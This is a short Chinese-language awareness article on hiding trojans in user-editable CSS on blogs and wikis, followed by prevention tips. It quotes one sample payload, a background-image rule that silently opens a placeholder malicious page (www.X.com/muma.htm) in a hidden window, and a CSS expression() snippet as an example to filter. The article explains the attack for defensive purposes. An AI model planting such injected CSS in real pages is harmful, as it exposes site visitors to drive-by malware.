CSS可以用來編寫網(wǎng)頁特效，但說到CSS可以掛木馬，你是不是有點不信？

隨著web2.0的普及，網(wǎng)頁形式日新月異，許多可以自定義CSS的wiki、網(wǎng)站、社區(qū)、博客日益增多。這也就成了掛馬黑客們的溫床。

這些黑客往往借著網(wǎng)民們對大網(wǎng)站的信賴，在自己的博客或其他頁面中植入木馬，欺騙訪問的用戶。

一般黑客在CSS中注入木馬的方式很簡單，就是將木馬放到指定的位置，然?后利用body、background-image等方式調(diào)用背景圖片，或者在調(diào)用的命令中插入T代碼，形成：

background-image: url(t:open("http://www.X.com/muma.htm"，"newwindow"，"border="1" Height=0， Width=0， top=1000， center=0， toolbar=no，menubar=no， scrollbars=no，resizable=no，location=no，status=no"))

這種中病毒的癥狀一般是不易被發(fā)現(xiàn)的，往往只是表現(xiàn)為打開了一個空白網(wǎng)頁，或者網(wǎng)頁悄悄在后臺運營，干脆讓用戶看不到。

所以，為了預(yù)防CSS病毒和木馬，大家應(yīng)該至少做到以下幾條：

1、安裝防病毒軟件，在打開來路不明文件時一定要掃描，在軟件有提示時一定慎重選擇操作。

    2、不要隨意訪問陌生網(wǎng)頁，盡量屏蔽網(wǎng)頁自動打開的窗口；

    3、經(jīng)常更新系統(tǒng)漏洞文件；

    4、過濾比較敏感的CSS內(nèi)容，如 emiao1:expression(this.src="about:blank"，this.outerHTML="");